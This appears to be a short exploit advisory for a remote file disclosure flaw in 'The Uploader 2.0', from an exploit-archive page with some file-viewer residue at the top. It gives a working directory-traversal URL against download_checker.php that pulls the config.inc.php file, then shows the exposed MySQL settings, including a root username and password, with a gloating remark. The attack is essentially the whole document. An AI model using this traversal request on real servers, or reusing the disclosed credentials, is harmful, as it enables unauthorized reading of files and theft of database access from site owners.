12 lines
No EOL
415 B
Text
12 lines
No EOL
415 B
Text
# Title: The Uploader 2.0 Remote File disclosure Vulnerability
|
|
# Author: Stack
|
|
|
|
http://server/the_uploader/api/download_checker.php?filename=../config.inc.php
|
|
|
|
next open the config.inc.php file and you got the MySQL configuration ( user & password ) :d
|
|
|
|
//MySQL configuration and connection functions
|
|
$main['host']="127.0.0.1";
|
|
$main['user']="root";
|
|
$main['pass']="jH445Ui";
|
|
$main['dbnm']="jkL_database"; |